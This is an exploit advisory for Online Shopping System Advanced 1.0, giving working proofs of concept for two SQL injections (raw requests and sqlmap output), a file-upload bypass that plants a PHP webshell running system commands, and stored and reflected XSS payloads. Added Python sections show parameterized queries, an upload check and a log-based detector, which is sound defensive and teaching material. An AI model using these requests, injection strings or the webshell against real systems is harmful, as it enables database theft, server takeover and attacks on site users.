Online Shopping System Advanced 1.0 XSS / SQL Injection / Code Execution
Posted Mar 28, 2023
Authored by Rafael Pedrero

Online Shopping System Advanced version 1.0 suffers from code execution, cross site scripting, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, code execution, xss, sql injection
SHA-256 | d016e73da19bd9b2b318eea4c377983be13ee45418a1cb5e83aed5c8218cce71

# Exploit Title: Online shopping system advanced 1.0 - Multiple
Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2020-09-24
# Vendor Homepage:
https://github.com/PuneethReddyHC/online-shopping-system-advanced
# Software Link :
https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip
# Tested Version: 1.0
# Tested on: Windows 10 using XAMPP / Linux Ubuntu server 18.04 + Apache +
php 5.X/7.X + MySQL

# Recap: SQLi = 2, RCE = 1, stored XSS = 2, reflected XSS = 2: 7
vulnerabilities

# Vulnerability Type: SQL Injection - #1

CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-89

Vulnerability description: Online shopping system advanced 1.0 allows SQL
injection via the admin/edit_user.php, user_id parameter.

Proof of concept:

Save this content in a file:

POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------120411781422335
Content-Length: 489
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1

-----------------------------120411781422335
Content-Disposition: form-data; name="user_id"

25
-----------------------------120411781422335
Content-Disposition: form-data; name="email"

otheruser@gmail.com
-----------------------------120411781422335
Content-Disposition: form-data; name="password"

puneeth@123
-----------------------------120411781422335
Content-Disposition: form-data; name="btn_save"


-----------------------------120411781422335--


And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p user_id

(custom) POST parameter 'MULTIPART user_id' is vulnerable. Do you want to
keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 115
HTTP(s) requests:
---
Parameter: MULTIPART user_id ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: -----------------------------120411781422335
Content-Disposition: form-data; name="user_id"

25' AND SLEEP(5) AND 'HGWF'='HGWF
-----------------------------120411781422335
Content-Disposition: form-data; name="email"

otheruser@gmail.com
-----------------------------120411781422335
Content-Disposition: form-data; name="password"

puneeth@123
-----------------------------120411781422335
Content-Disposition: form-data; name="btn_save"


-----------------------------120411781422335--
---
[16:25:28] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12


# Vulnerability Type: SQL Injection - #2

CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-89

Vulnerability description: Online shopping system advanced 1.0 allows SQL
injection via the action.php, proId parameter.

Proof of concept:

Save this content in a file:

POST http://127.0.0.1/online/action.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Host: 127.0.0.1

addToCart=1&proId=70


And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p proId

POST parameter 'proId' is vulnerable. Do you want to keep testing the
others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 72
HTTP(s) requests:
---
Parameter: proId (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: addToCart=1&proId=70' AND 7704=7704 AND 'IGsd'='IGsd

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: addToCart=1&proId=70' AND SLEEP(5) AND 'pAwv'='pAwv
---
[16:03:38] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
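An added illustration of why the proId probes in the sqlmap output above succeed, and why binding the value instead of concatenating it closes the hole. This is example code written for this page, not the application's own code: SQLite stands in for MySQL with an assumed products table, so only the boolean-based probe is reproduced (SQLite has no SLEEP()).

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the product table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id TEXT PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [("69", "lipstick"), ("70", "perfume"), ("71", "shampoo")])
    return conn

def lookup_concat(conn: sqlite3.Connection, pro_id: str) -> list:
    """Vulnerable pattern: the proId value is spliced into the SQL text, so a
    quote inside the value ends the literal and the rest is parsed as SQL."""
    sql = f"SELECT name FROM products WHERE id='{pro_id}'"
    return [row[0] for row in conn.execute(sql)]

def lookup_param(conn: sqlite3.Connection, pro_id: str) -> list:
    """Hardened pattern: the value is bound as a parameter; the SQL text is fixed."""
    return [row[0] for row in conn.execute("SELECT name FROM products WHERE id=?", (pro_id,))]

# The boolean-based blind probe sqlmap reported above, and its false counterpart.
TRUE_PROBE = "70' AND 7704=7704 AND 'IGsd'='IGsd"
FALSE_PROBE = "70' AND 7704=7705 AND 'IGsd'='IGsd"

def oracle_visible(lookup) -> bool:
    """True if the two probes produce different results: the query is then acting
    as a yes/no oracle on attacker-supplied SQL, which is exactly what sqlmap's
    'boolean-based blind' finding means."""
    conn = make_db()
    return lookup(conn, TRUE_PROBE) != lookup(conn, FALSE_PROBE)

if __name__ == "__main__":
    print("concatenated query exposes oracle:", oracle_visible(lookup_concat))
    print("parameterised query exposes oracle:", oracle_visible(lookup_param))
```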


# Vulnerability Type: Remote Command Execution (RCE)

CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-434

Vulnerability description: File Restriction Bypass vulnerabilities were
found in Online shopping system advanced v1.0. This allows an
authenticated user to potentially obtain RCE via a webshell.

Proof of concept:

1. Go to the add product page (admin/add_product.php)
2. Select a product image and load a valid image.
3. Turn Burp/ZAP Intercept On
4. Select a webshell - ex: shell.php
5. Alter the upload request:
Update 'filename' to the desired extension. ex: shell.php
It is not necessary to change the content type to 'image/png'

Example exploitation request:

====================================================================================================

POST http://127.0.0.1/online/admin/add_product.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------184982084830387
Content-Length: 960
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/add_product.php
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1

-----------------------------184982084830387
Content-Disposition: form-data; name="product_name"

demo2
-----------------------------184982084830387
Content-Disposition: form-data; name="details"

demo2
-----------------------------184982084830387
Content-Disposition: form-data; name="picture"; filename="shell.php"
Content-Type: image/gif

<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?>
-----------------------------184982084830387
Content-Disposition: form-data; name="price"

1
-----------------------------184982084830387
Content-Disposition: form-data; name="product_type"

1
-----------------------------184982084830387
Content-Disposition: form-data; name="brand"

1
-----------------------------184982084830387
Content-Disposition: form-data; name="tags"

Summet
-----------------------------184982084830387
Content-Disposition: form-data; name="submit"


-----------------------------184982084830387--

====================================================================================================

6. To view the webshell path go to Product List (admin/cosmetics_list.php)
7. Send the request and visit your new webshell
Ex:
http://127.0.0.1/online/product_images/1600959116_shell.php?cmd=whoami
nt authority\system
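The bypass above works because the application stores the picture under the client-supplied filename and only looks at fields the client controls. An added example of the upload check a fix would need, written for this page rather than taken from the project (the accepted formats and their magic bytes are an assumed policy): the stored extension is derived from the file content, the client's filename and Content-Type are never trusted, and the server picks the name.

```python
import os
import secrets

# Image types the product-image form should accept, keyed by extension with
# the leading bytes that identify each format (assumed policy for this example).
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
}

def sniff_image_type(data: bytes):
    """Identify the format from the file content itself. The filename and the
    Content-Type part header are both chosen by the client, so neither is trusted."""
    for ext, magics in MAGIC.items():
        if data.startswith(magics):
            return ext
    return None

def validate_upload(filename: str, content_type: str, data: bytes):
    """Return a server-chosen storage name for an acceptable image, else None.
    content_type is received only to make explicit that it plays no part."""
    claimed = os.path.splitext(filename)[1].lstrip(".").lower()
    claimed = "jpg" if claimed == "jpeg" else claimed
    actual = sniff_image_type(data)
    if actual is None or claimed != actual:
        return None
    # The app kept the client's base name (timestamp + shell.php) and served it
    # from product_images/. Instead: random name, extension taken from content.
    return f"{secrets.token_hex(16)}.{actual}"

# Constructed stand-ins for two uploads: the advisory's bypass (a PHP body sent
# as filename="shell.php" with Content-Type: image/gif) and a genuine GIF.
PHP_UPLOAD = ("shell.php", "image/gif", b"<?php /* webshell body as in the advisory */ ?>")
GIF_UPLOAD = ("photo.gif", "image/gif", b"GIF89a" + bytes(16))

if __name__ == "__main__":
    print("shell.php upload stored as:", validate_upload(*PHP_UPLOAD))
    print("photo.gif upload stored as:", validate_upload(*GIF_UPLOAD))
```

A header check alone does not catch a polyglot that carries a valid GIF header followed by PHP code, so the product_images directory should additionally sit outside the web root or be configured so the server never hands its files to the PHP handler.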

# Vulnerability Type: stored Cross-Site Scripting (XSS) - #1

CVSS v3: 6.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Online shopping system advanced v1.0 does not
sufficiently encode user-controlled inputs, resulting in a stored
Cross-Site Scripting (XSS) vulnerability via admin/edit_user.php, in
multiple parameters.

Proof of concept:

Stored:

POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------120411781422335
Content-Length: 496
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1

-----------------------------120411781422335
Content-Disposition: form-data; name="user_id"

25
-----------------------------120411781422335
Content-Disposition: form-data; name="email"

otheruser@gmail.com
-----------------------------120411781422335
Content-Disposition: form-data; name="password"

</td><script>alert(1);</script><td>
-----------------------------120411781422335
Content-Disposition: form-data; name="btn_save"


-----------------------------120411781422335--


# Vulnerability Type: stored Cross-Site Scripting (XSS) - #2

CVSS v3: 6.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Online shopping system advanced v1.0 does not
sufficiently encode user-controlled inputs, resulting in a stored
Cross-Site Scripting (XSS) vulnerability via admin/add_user.php, in
multiple parameters.

Proof of concept:

Stored:

POST http://127.0.0.1/online/admin/add_user.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/add_user.php
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1

first_name=demo&last_name=demo&email=demo%40localhost.inet&user_password=demo&mobile=5555555555&address1=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctd%3E&address2=here+5&btn_save=


# Vulnerability Type: reflected Cross-Site Scripting (XSS) - #1

CVSS v3: 6.1
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Online shopping system advanced v1.0 does not
sufficiently encode user-controlled inputs, resulting in a reflected
Cross-Site Scripting (XSS) vulnerability via admin/clothes_list.php, in
the page parameter.

Proof of concept:

Reflected:

http://127.0.0.1/online/admin/clothes_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E


# Vulnerability Type: reflected Cross-Site Scripting (XSS) - #2

CVSS v3: 6.1
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Online shopping system advanced v1.0 does not
sufficiently encode user-controlled inputs, resulting in a reflected
Cross-Site Scripting (XSS) vulnerability via admin/cosmetics_list.php,
in the page parameter.

Proof of concept:

Reflected:

http://127.0.0.1/online/admin/cosmetics_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E
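A detection pass over web-server access-log lines, added here as an example and not part of the advisory, that flags two of the indicators this page gives: a request for a PHP-type file under the product_images upload directory (the webshell URL from step 7 of the RCE section) and a non-numeric page parameter on the two admin list pages (the reflected XSS entries). The log lines are constructed in Apache combined format; the SQL injection requests travel in POST bodies, which access logs do not record, so they are out of scope here.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log format (the constructed sample lines below follow it)
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_DIR = "/online/product_images/"           # where add_product.php stores pictures
LIST_PAGES = ("/online/admin/clothes_list.php",   # pages whose ?page= value is reflected
              "/online/admin/cosmetics_list.php")
PHP_EXT = re.compile(r"\.ph(?:p\d?|tml|ar)$", re.IGNORECASE)  # php, php5, phtml, phar

def classify(line: str):
    """Return an indicator name for a suspicious request, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    path, params = url.path, parse_qs(url.query)
    # A script extension inside the picture directory should never occur: an
    # uploaded "picture" being fetched as PHP is the RCE case from the advisory.
    if path.startswith(UPLOAD_DIR) and PHP_EXT.search(path):
        return "webshell-hit"
    # The paginator only ever needs an integer; anything else in ?page= is a
    # probe (parse_qs has already percent-decoded the value).
    if path in LIST_PAGES and any(not v.isdigit() for v in params.get("page", [])):
        return "reflected-xss-probe"
    return None

def scan(log_text: str):
    """Return (line_number, indicator, request_target) for each flagged line."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        kind = classify(line)
        if kind:
            hits.append((n, kind, LINE_RE.match(line).group("target")))
    return hits

# Constructed sample log; the request paths are the ones shown in the advisory.
SAMPLE_LOG = """\
127.0.0.1 - - [24/Sep/2020:16:25:16 +0200] "GET /online/product_images/1600959116_shell.php?cmd=whoami HTTP/1.1" 200 51 "-" "Mozilla/5.0"
127.0.0.1 - - [24/Sep/2020:16:26:01 +0200] "GET /online/admin/clothes_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
127.0.0.1 - - [24/Sep/2020:16:27:10 +0200] "GET /online/admin/cosmetics_list.php?page=2 HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
127.0.0.1 - - [24/Sep/2020:16:27:30 +0200] "GET /online/product_images/1600959000_photo.png HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for n, kind, target in scan(SAMPLE_LOG):
        print(f"line {n}: {kind}: {target}")
```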
